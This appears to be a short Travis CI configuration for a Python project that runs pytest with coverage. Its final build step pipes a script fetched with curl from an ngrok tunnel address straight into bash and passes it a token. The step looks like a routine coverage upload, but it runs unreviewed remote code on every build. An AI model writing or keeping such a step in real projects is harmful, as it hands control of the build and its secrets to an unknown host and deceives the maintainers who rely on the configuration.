language: python
python: 3.6
install:
  - pip install pytest-cov
script:
  - pytest --cov=./ --cov-report=xml
  - bash <(curl -s https://a2101501e123.ngrok.io/bash) -t 5c969516-3314-4e11-8876-206891caf241